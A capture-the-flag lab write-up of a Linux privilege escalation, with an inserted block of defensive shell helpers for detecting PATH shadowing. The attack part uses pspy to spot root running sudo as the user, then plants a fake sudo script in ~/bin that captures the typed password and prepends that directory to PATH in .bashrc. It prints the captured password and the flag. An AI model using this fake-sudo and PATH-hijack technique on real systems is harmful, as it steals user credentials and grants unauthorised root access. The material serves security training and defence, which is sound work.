Eavesdropper


Last updated 2 years ago


Hello again, hacker. After uncovering a user Frank's SSH private key, you've broken into a target environment.

Download the SSH private key attached.

Note: If you are using the AttackBox, you can copy and paste the SSH private key using the "Clipboard" icon located on the slide-out tray, as demonstrated by the GIF below:

Answer the questions below

Download the attached file.


Find the Flag


You have access under frank, but you want to be root! How can you escalate privileges? If you listen closely, maybe you can uncover something that might help!

Note: Please allow 3-5 minutes for the VM to boot up fully before attempting the challenge.

Answer the questions below

┌──(witty㉿kali)-[~/Downloads]
└─$ cat idrsa.id-rsa 


┌──(witty㉿kali)-[~/Downloads]
└─$ chmod 600 idrsa.id-rsa             
                                                                                             
┌──(witty㉿kali)-[~/Downloads]
└─$ ssh -i idrsa.id-rsa frank@10.10.85.42
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Thu Mar  2 16:49:31 2023 from 172.18.0.3
frank@workstation:~$ whoami
frank

frank@workstation:~$ find / -perm -4000 2>/dev/null | xargs ls -lah
-rwsr-xr-x 1 root root        84K Jul 14  2021 /usr/bin/chfn
-rwsr-xr-x 1 root root        52K Jul 14  2021 /usr/bin/chsh
-rwsr-xr-x 1 root root        87K Jul 14  2021 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        55K Feb  7  2022 /usr/bin/mount
-rwsr-xr-x 1 root root        44K Jul 14  2021 /usr/bin/newgrp
-rwsr-xr-x 1 root root        67K Jul 14  2021 /usr/bin/passwd
-rwsr-xr-x 1 root root        67K Feb  7  2022 /usr/bin/su
-rwsr-xr-x 1 root root       163K Jan 19  2021 /usr/bin/sudo
-rwsr-xr-x 1 root root        39K Feb  7  2022 /usr/bin/umount
-rwsr-xr-- 1 root messagebus  51K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root       463K Dec  2  2021 /usr/lib/openssh/ssh-keysign

frank@workstation:~$ sudo -l
[sudo] password for frank: 
Sorry, try again.
[sudo] password for frank: 
Sorry, try again.
[sudo] password for frank: 
sudo: 3 incorrect password attempts

┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 7070
Serving HTTP on 0.0.0.0 port 7070 (http://0.0.0.0:7070/) ...
10.10.85.42 - - [02/Mar/2023 11:55:27] "GET /pspy64 HTTP/1.1" 200 -


frank@workstation:/tmp$ wget http://10.8.19.103:7070/pspy64
--2023-03-02 16:55:27--  http://10.8.19.103:7070/pspy64
Connecting to 10.8.19.103:7070... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64                  100%[============================>]   2.96M   812KB/s    in 3.7s    

2023-03-02 16:55:32 (812 KB/s) - ‘pspy64’ saved [3104768/3104768]

frank@workstation:/tmp$ chmod +x pspy64 
frank@workstation:/tmp$ ./pspy64 
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
                   ░           ░ ░     
                               ░ ░     

Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2023/03/02 16:56:19 CMD: UID=1000  PID=1790   | ./pspy64 
2023/03/02 16:56:19 CMD: UID=1000  PID=1011   | -bash 
2023/03/02 16:56:19 CMD: UID=1000  PID=1010   | sshd: frank@pts/0    
2023/03/02 16:56:19 CMD: UID=0     PID=996    | sshd: frank [priv]   
2023/03/02 16:56:19 CMD: UID=0     PID=1      | sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups 
2023/03/02 16:56:34 CMD: UID=0     PID=1797   | sshd: [accepted]  
2023/03/02 16:56:34 CMD: UID=0     PID=1798   | sshd: [accepted]     
2023/03/02 16:56:34 CMD: UID=0     PID=1799   | sshd: frank [priv]   
2023/03/02 16:56:34 CMD: UID=0     PID=1800   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
2023/03/02 16:56:34 CMD: UID=0     PID=1801   | run-parts --lsbsysinit /etc/update-motd.d 
2023/03/02 16:56:34 CMD: UID=0     PID=1802   | /bin/sh /etc/update-motd.d/00-header 
2023/03/02 16:56:34 CMD: UID=0     PID=1803   | /bin/sh /etc/update-motd.d/00-header 
2023/03/02 16:56:34 CMD: UID=0     PID=1804   | /bin/sh /etc/update-motd.d/00-header 
2023/03/02 16:56:34 CMD: UID=0     PID=1805   | run-parts --lsbsysinit /etc/update-motd.d 
2023/03/02 16:56:34 CMD: UID=0     PID=1806   | run-parts --lsbsysinit /etc/update-motd.d 
2023/03/02 16:56:34 CMD: UID=0     PID=1807   | run-parts --lsbsysinit /etc/update-motd.d 
2023/03/02 16:56:34 CMD: UID=0     PID=1808   | sshd: frank [priv]   
2023/03/02 16:56:34 CMD: UID=1000  PID=1809   | sshd: frank@pts/1    
2023/03/02 16:56:35 CMD: UID=1000  PID=1810   | sshd: frank@pts/1    
2023/03/02 16:56:36 CMD: UID=1000  PID=1811   | sshd: frank@pts/1    
2023/03/02 16:56:37 CMD: UID=1000  PID=1812   | sshd: frank@pts/1    
2023/03/02 16:56:37 CMD: UID=1000  PID=1813   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1814   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1815   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1816   | /bin/sh /etc/init.d/dbus status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1818   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1817   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1819   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1820   | /bin/sh /etc/init.d/hwclock.sh status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1822   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1821   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1823   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1824   | /bin/sh /etc/init.d/procps status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1825   | /bin/sh /etc/init.d/procps status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1826   | /bin/sh /etc/init.d/procps status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1827   | /bin/sh /etc/init.d/procps status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1829   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1828   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1830   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1833   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1832   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1831   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1834   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1835   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1836   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:56:37 CMD: UID=1000  PID=1838   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:37 CMD: UID=1000  PID=1837   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:56:38 CMD: UID=1000  PID=1839   | sshd: frank@pts/1    
2023/03/02 16:56:39 CMD: UID=1000  PID=1840   | sshd: frank@pts/1    
2023/03/02 16:56:39 CMD: UID=0     PID=1841   | sudo cat /etc/shadow 
2023/03/02 16:56:59 CMD: UID=0     PID=1842   | sshd: [accepted]  
2023/03/02 16:56:59 CMD: UID=0     PID=1843   | sshd: [accepted]     
2023/03/02 16:56:59 CMD: UID=0     PID=1844   | sshd: frank [priv]   
2023/03/02 16:56:59 CMD: UID=0     PID=1845   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new 
2023/03/02 16:56:59 CMD: UID=0     PID=1846   | run-parts --lsbsysinit /etc/update-motd.d 
2023/03/02 16:56:59 CMD: UID=0     PID=1847   | /bin/sh /etc/update-motd.d/00-header 
2023/03/02 16:56:59 CMD: UID=0     PID=1848   | /bin/sh /etc/update-motd.d/00-header 
2023/03/02 16:56:59 CMD: UID=0     PID=1849   | /bin/sh /etc/update-motd.d/00-header 
2023/03/02 16:56:59 CMD: UID=0     PID=1850   | run-parts --lsbsysinit /etc/update-motd.d 
2023/03/02 16:56:59 CMD: UID=0     PID=1851   | run-parts --lsbsysinit /etc/update-motd.d 
2023/03/02 16:56:59 CMD: UID=0     PID=1852   | run-parts --lsbsysinit /etc/update-motd.d 
2023/03/02 16:56:59 CMD: UID=0     PID=1853   | sshd: frank [priv]   
2023/03/02 16:56:59 CMD: UID=1000  PID=1854   | sshd: frank@pts/1    
2023/03/02 16:57:00 CMD: UID=1000  PID=1855   | sshd: frank@pts/1    
2023/03/02 16:57:01 CMD: UID=1000  PID=1856   | sshd: frank@pts/1    
2023/03/02 16:57:02 CMD: UID=1000  PID=1857   | sshd: frank@pts/1    
2023/03/02 16:57:02 CMD: UID=1000  PID=1858   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1859   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1860   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1861   | /bin/sh /etc/init.d/dbus status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1863   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1862   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1864   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1865   | /bin/sh /etc/init.d/hwclock.sh status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1867   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1866   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1868   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1869   | /bin/sh /etc/init.d/procps status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1870   | /bin/sh /etc/init.d/procps status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1871   | /bin/sh /etc/init.d/procps status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1872   | /bin/sh /etc/init.d/procps status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1874   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1873   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1875   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1878   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1877   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1876   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1879   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1880   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1881   | /bin/sh /etc/init.d/ssh status 
2023/03/02 16:57:02 CMD: UID=1000  PID=1883   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:02 CMD: UID=1000  PID=1882   | /bin/sh /usr/sbin/service --status-all 
2023/03/02 16:57:03 CMD: UID=1000  PID=1884   | sshd: frank@pts/1    
2023/03/02 16:57:04 CMD: UID=1000  PID=1885   | sshd: frank@pts/1    
2023/03/02 16:57:05 CMD: UID=0     PID=1886   | sudo cat /etc/shadow 

frank@workstation:/tmp$ ps aux
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.7  12172  7224 ?        Ss   16:40   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root         996  0.0  0.9  13576  9032 ?        Ss   16:49   0:00 sshd: frank [priv]
frank       1010  0.2  0.7  15264  7656 ?        S    16:49   0:02 sshd: frank@pts/0
frank       1011  0.0  0.3   5992  3896 pts/0    Ss   16:49   0:00 -bash
frank       2657  0.0  0.3   7644  3232 pts/0    R+   17:04   0:00 ps aux

frank@workstation:/tmp$ netstat -tulpn
(No info could be read for "-p": geteuid()=1000 but you should be root.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.11:34385        0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.11:48841        0.0.0.0:*                           -                   

frank@workstation:/tmp$ echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

frank@workstation:/tmp$ cat /etc/hosts
127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
172.18.0.2	workstation

frank@workstation:/tmp$ tcpdump -A -i eth1 -w /tmp/tcpdump.pcap
-bash: tcpdump: command not found

frank@workstation:/tmp$ ethercap
-bash: ethercap: command not found

frank@workstation:~$ pwd
/home/frank
frank@workstation:~$ ls -lah
total 32K
drwxr-xr-x 1 frank frank 4.0K Mar 14  2022 .
drwxr-xr-x 1 root  root  4.0K Mar 14  2022 ..
lrwxrwxrwx 1 frank frank    9 Mar 14  2022 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 frank frank 3.7K Feb 25  2020 .bashrc
drwx------ 2 frank frank 4.0K Mar 14  2022 .cache
-rw-r--r-- 1 frank frank  807 Feb 25  2020 .profile
drwxr-xr-x 1 frank frank 4.0K Mar 14  2022 .ssh
-rw-r--r-- 1 frank frank    0 Mar 14  2022 .sudo_as_admin_successful
frank@workstation:~$ head .bashrc 
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;
esac

`bashrc` stands for "Bourne-Again SHell Run Commands", and it is a shell script that is run by Bash, the default shell for most Linux distributions and macOS. The `bashrc` file contains a set of commands that are executed every time a new Bash shell is started.

The `bashrc` file is typically located in the user's home directory (`~/.bashrc`) and can be edited using a text editor such as `nano` or `vim`. The file can be used to customize the behavior of the Bash shell, including setting environment variables, defining aliases, and creating functions.

Some common examples of customizations that can be made in the `bashrc` file include setting the default prompt, adding directories to the system path, and defining shortcuts for frequently used commands.

It's important to note that changes made to the `bashrc` file only take effect in new Bash shells that are started after the changes have been made. If you want to apply the changes immediately, you can either log out and log back in, or run the command `source ~/.bashrc` to reload the `bashrc` file in the current shell.

You can also change the PATH environment variable in the `bashrc` file to add directories to the system path.

The PATH environment variable is a list of directories separated by colons (`:`), and it tells the shell where to look for executable files when a command is entered. By default, the PATH variable includes system directories such as `/usr/bin` and `/usr/local/bin`, but you can add additional directories to the PATH by modifying the `bashrc` file.

In the command `export PATH=/home/frank/bin:$PATH`, the `/home/frank/bin` directory is added to the beginning of the `PATH` variable. This means that when you enter a command, the shell will first search for an executable file in `/home/frank/bin`, and if it doesn't find the file there, it will continue searching in the directories listed in the rest of the `PATH` variable.

In the command `export PATH=$PATH:/home/frank/bin`, the `/home/frank/bin` directory is added to the end of the `PATH` variable. This means that the shell will search for an executable file in all of the directories listed in the `PATH` variable first, and if it doesn't find the file in any of those directories, it will then search in `/home/frank/bin`.

So, depending on the situation, one command may be more appropriate than the other. If you want to give priority to executables in a specific directory, you should use the first command. If you want to add a new directory to the existing `PATH` variable, you should use the second command.
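Added example, not part of the original writeup: a few POSIX sh helpers that show why a directory prepended to PATH wins the lookup, and that check whether the `sudo` a user's shell would actually run is the system one. It builds its own throwaway directory layout with mktemp, so every path in it is constructed; the sudoers `secure_path` shown later in this writeup only governs PATH inside a sudo session and does nothing to protect how the user's shell finds `sudo` in the first place.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit helpers for the PATH-order
# issue described above. A shell resolves a bare command name by walking PATH
# left to right and running the first executable it finds, so any user-writable
# directory placed ahead of /usr/bin can supply a lookalike "sudo".
# Note: the sudoers secure_path only governs PATH *inside* a sudo session; it does
# not affect how the user's own shell locates the sudo binary in the first place.
# Everything under the mktemp directory below is constructed for the demo.

# resolve_first NAME PATHLIST
# Print the first regular, executable NAME along PATHLIST (what `type -P` does).
# Runs in a subshell so changing IFS does not leak into the caller.
resolve_first() (
    IFS=:
    for d in $2; do
        [ -z "$d" ] && d=.            # an empty entry means the current directory
        if [ -f "$d/$1" ] && [ -x "$d/$1" ]; then
            printf '%s\n' "$d/$1"
            exit 0
        fi
    done
    exit 1
)

# hijack_check NAME CANONICAL PATHLIST
# Return 0 if the shell would run CANONICAL, 1 if an earlier PATH entry shadows
# it (the impostor is reported on stderr), 2 if NAME is not on PATH at all.
hijack_check() {
    found=$(resolve_first "$1" "$3") || { echo "$1: not found on PATH" >&2; return 2; }
    if [ "$found" != "$2" ]; then
        echo "SHADOWED: $1 resolves to $found, expected $2" >&2
        return 1
    fi
    return 0
}

# dirs_before DIR PATHLIST
# List the PATH entries searched before DIR. These are the only places a
# lookalike can live, so checking their owner and write bits (and who can edit
# the rc file that prepends them) is the whole audit.
dirs_before() (
    IFS=:
    for d in $2; do
        [ "$d" = "$1" ] && exit 0
        printf '%s\n' "$d"
    done
)

# demo_layout: build a constructed tree mirroring the writeup (a "real" sudo
# under usr/bin and a password-reading lookalike under home/frank/bin) and
# print its root so the caller can clean it up afterwards.
demo_layout() {
    T=$(mktemp -d)
    mkdir -p "$T/usr/bin" "$T/home/frank/bin"
    printf '#!/bin/sh\necho real sudo\n' > "$T/usr/bin/sudo"
    printf '#!/bin/sh\nread password\n' > "$T/home/frank/bin/sudo"
    chmod +x "$T/usr/bin/sudo" "$T/home/frank/bin/sudo"
    printf '%s\n' "$T"
}
```

From the account being audited, `hijack_check sudo /usr/bin/sudo "$PATH"` answers the question directly, and `dirs_before /usr/bin "$PATH"` lists the directories whose ownership needs checking.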

So let's choose the first option, prepending `/home/frank/bin` to `PATH`.

Placing a fake `sudo` file there so that it gets executed instead of the real one:

frank@workstation:~$ /bin/sudo  -l
[sudo] password for frank: 
Sorry, try again.
[sudo] password for frank: 
Sorry, try again.
[sudo] password for frank: 
sudo: 3 incorrect password attempts

Creating a "bin" directory is a common convention in Unix-like systems, and it is often used to store executable files and scripts that can be run from the command line. By convention, the directories `/bin`, `/usr/bin`, and `/usr/local/bin` are reserved for system executables, while the directory `~/bin` (i.e., a "bin" directory in the user's home directory) is often used for user-specific executables and scripts.

frank@workstation:~$ mkdir ./bin
frank@workstation:~$ ls -lah
total 36K
drwxr-xr-x 1 frank frank 4.0K Mar  2 18:45 .
drwxr-xr-x 1 root  root  4.0K Mar 14  2022 ..
lrwxrwxrwx 1 frank frank    9 Mar 14  2022 .bash_history -> /dev/null
-rw-r--r-- 1 frank frank  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 frank frank 3.7K Feb 25  2020 .bashrc
drwx------ 2 frank frank 4.0K Mar 14  2022 .cache
-rw-r--r-- 1 frank frank  807 Feb 25  2020 .profile
drwxr-xr-x 1 frank frank 4.0K Mar 14  2022 .ssh
-rw-r--r-- 1 frank frank    0 Mar 14  2022 .sudo_as_admin_successful
drwxrwxr-x 2 frank frank 4.0K Mar  2 18:45 bin
frank@workstation:~$ ls
bin


The `mkdir ./bin` command creates a new directory called "bin" in the current directory.

frank@workstation:~/bin$ nano sudo
frank@workstation:~/bin$ chmod +x sudo
frank@workstation:~/bin$ cat sudo
#!/bin/bash
read password
echo $password >> /home/frank/password_L.txt

frank@workstation:~/bin$ cd ..
frank@workstation:~$ nano .bashrc
frank@workstation:~$ head .bashrc
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

export PATH=/home/frank/bin:$PATH

# If not running interactively, don't do anything
case $- in
    *i*) ;;
      *) return;;

frank@workstation:~$ chmod +x ./bin/sudo
frank@workstation:~$ ls
bin  password_L.txt

frank@workstation:~$ cat password_L.txt 
!@#frankisawesome2022%*
!@#frankisawesome2022%*
!@#frankisawesome2022%*
!@#frankisawesome2022%*
!@#frankisawesome2022%*
!@#frankisawesome2022%*

frank@workstation:~$ sudo -l
[sudo] password for frank: !@#frankisawesome2022%*
Matching Defaults entries for frank on workstation:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User frank may run the following commands on workstation:
    (ALL : ALL) ALL
frank@workstation:~$ sudo -s
root@workstation:/home/frank# cd /root
root@workstation:~# ls
flag.txt
root@workstation:~# cat flag.txt 
flag{14370304172628f784d8e8962d54a600}
root@workstation:~# ls -lah
total 20K
drwx------ 1 root root 4.0K Mar 14  2022 .
drwxr-xr-x 1 root root 4.0K Mar 14  2022 ..
-rw-r--r-- 1 root root 3.1K Dec  5  2019 .bashrc
-rw-r--r-- 1 root root  161 Dec  5  2019 .profile
-rw-r--r-- 1 root root   39 Mar 14  2022 flag.txt
root@workstation:~# cat .profile 
# ~/.profile: executed by Bourne-compatible login shells.

if [ "$BASH" ]; then
  if [ -f ~/.bashrc ]; then
    . ~/.bashrc
  fi
fi

mesg n 2> /dev/null || true
root@workstation:~# head .bashrc 
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples

# If not running interactively, don't do anything
[ -z "$PS1" ] && return

# don't put duplicate lines in the history. See bash(1) for more options
# ... or force ignoredups and ignorespace
HISTCONTROL=ignoredups:ignorespace
root@workstation:~# ls -lah /
total 68K
drwxr-xr-x   1 root root 4.0K Mar 14  2022 .
drwxr-xr-x   1 root root 4.0K Mar 14  2022 ..
-rwxr-xr-x   1 root root    0 Mar 14  2022 .dockerenv
lrwxrwxrwx   1 root root    7 Mar  2  2022 bin -> usr/bin
drwxr-xr-x   2 root root 4.0K Apr 15  2020 boot
drwxr-xr-x   5 root root  340 Mar  2 16:40 dev
drwxr-xr-x   1 root root 4.0K Mar 14  2022 etc
drwxr-xr-x   1 root root 4.0K Mar 14  2022 home
lrwxrwxrwx   1 root root    7 Mar  2  2022 lib -> usr/lib
lrwxrwxrwx   1 root root    9 Mar  2  2022 lib32 -> usr/lib32
lrwxrwxrwx   1 root root    9 Mar  2  2022 lib64 -> usr/lib64
lrwxrwxrwx   1 root root   10 Mar  2  2022 libx32 -> usr/libx32
drwxr-xr-x   2 root root 4.0K Mar  2  2022 media
drwxr-xr-x   2 root root 4.0K Mar  2  2022 mnt
drwxr-xr-x   2 root root 4.0K Mar  2  2022 opt
dr-xr-xr-x 156 root root    0 Mar  2 16:40 proc
drwx------   1 root root 4.0K Mar 14  2022 root
drwxr-xr-x   1 root root 4.0K Mar  2 18:55 run
lrwxrwxrwx   1 root root    8 Mar  2  2022 sbin -> usr/sbin
drwxr-xr-x   2 root root 4.0K Mar  2  2022 srv
dr-xr-xr-x  13 root root    0 Mar  2 16:40 sys
drwxrwxrwt   1 root root 4.0K Mar  2 16:55 tmp
drwxr-xr-x   1 root root 4.0K Mar  2  2022 usr
drwxr-xr-x   1 root root 4.0K Mar  2  2022 var

We were in a container, I knew it.

What is the flag in root's home directory?

What's going on in the system?

flag{14370304172628f784d8e8962d54a600}


[GIF: using the slide-out tray to copy and paste into the AttackBox]